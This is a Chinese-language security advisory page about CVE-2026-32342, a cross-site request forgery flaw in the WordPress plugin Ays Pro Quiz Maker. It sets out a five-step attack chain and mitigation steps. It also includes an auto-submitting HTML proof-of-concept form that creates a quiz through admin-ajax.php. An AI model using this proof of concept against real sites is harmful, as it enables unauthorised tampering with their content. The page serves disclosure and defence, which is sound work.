IPBUF安全漏洞报告
English
CVE-2026-32342 CVSS 4.3 中危

CVE-2026-32342 Ays Pro Quiz Maker跨站请求伪造漏洞

披露日期: 2026-03-13

漏洞信息

漏洞编号
CVE-2026-32342
漏洞类型
CSRF
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Ays Pro Quiz Maker

相关标签

CSRF跨站请求伪造WordPress插件Quiz MakerAys Pro中等严重CVE-2026-32342

漏洞概述

CVE-2026-32342是WordPress插件Ays Pro Quiz Maker中的一个跨站请求伪造(CSRF)漏洞。该漏洞存在于插件的quiz-maker功能中,攻击者可以通过构造恶意的Web请求,诱骗已登录的管理员或用户在不知情的情况下执行非预期的操作。由于该插件广泛应用于WordPress网站,攻击者可能利用此漏洞修改Quiz设置、创建或删除测试题目,甚至可能进一步利用进行钓鱼攻击或数据篡改。CVSS评分4.3属于中等严重程度,攻击复杂度低,无需特殊权限,但需要用户交互。漏洞影响范围涵盖Quiz Maker 6.7.1.2及以下所有版本,建议用户尽快升级到最新版本以修复此安全问题。

技术细节

跨站请求伪造(CSRF)是一种攻击技术,攻击者利用用户已认证的身份诱骗浏览器发送非预期的请求。在Ays Pro Quiz Maker插件中,由于缺乏适当的CSRF令牌验证,攻击者可以构造包含恶意参数的HTML表单或链接,当受害者访问时,浏览器会自动携带其Cookie发送请求。攻击者通常会创建钓鱼邮件或嵌入恶意代码的网页,诱导用户点击链接。该漏洞主要影响插件的以下功能:Quiz创建和编辑、题目管理、用户答案提交等。由于WordPress后台管理界面缺乏对关键操作的CSRF保护,攻击者可以远程修改Quiz配置、添加恶意内容或窃取用户数据。建议在所有状态变更操作中添加CSRF token验证,并验证请求来源。

攻击链分析

STEP 1
步骤1
攻击者创建包含恶意HTML表单的钓鱼页面,该表单自动向目标网站的Quiz Maker插件端点提交请求
STEP 2
步骤2
攻击者通过邮件、社交工程或恶意链接诱导已登录的管理员或用户访问该钓鱼页面
STEP 3
步骤3
受害者的浏览器自动携带有效的WordPress会话Cookie向目标站点发送POST请求
STEP 4
步骤4
由于插件缺少CSRF token验证,服务器将请求视为合法用户操作并执行
STEP 5
步骤5
攻击成功,恶意Quiz被创建或现有Quiz配置被篡改,攻击者可进一步利用进行数据窃取或钓鱼攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CSRF PoC for CVE-2026-32342 - Ays Pro Quiz Maker --> <html> <body> <h1>CVE-2026-32342 CSRF PoC</h1> <p>This PoC demonstrates a CSRF attack on Ays Pro Quiz Maker plugin.</p> <form action="http://target-site/wp-admin/admin-ajax.php" method="POST" id="csrf-form"> <input type="hidden" name="action" value="ays_quiz_store" /> <input type="hidden" name="quiz_title" value="Malicious Quiz" /> <input type="hidden" name="quiz_description" value="CSRF Injected Content" /> <input type="hidden" name="quiz_category" value="1" /> <input type="hidden" name="quiz_options" value='{"random_questions":true}' /> </form> <script> // Auto-submit the form when page loads document.getElementById('csrf-form').submit(); </script> <p>If you see this message, the CSRF attack was executed.</p> </body> </html>

影响范围

Quiz Maker <= 6.7.1.2

防御指南

临时缓解措施
临时缓解措施:在WordPress配置文件中添加HTTP Referer检查,限制管理后台访问IP,使用安全插件如Wordfence进行CSRF防护监控,必要时暂时禁用Quiz Maker插件直到完成安全更新。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表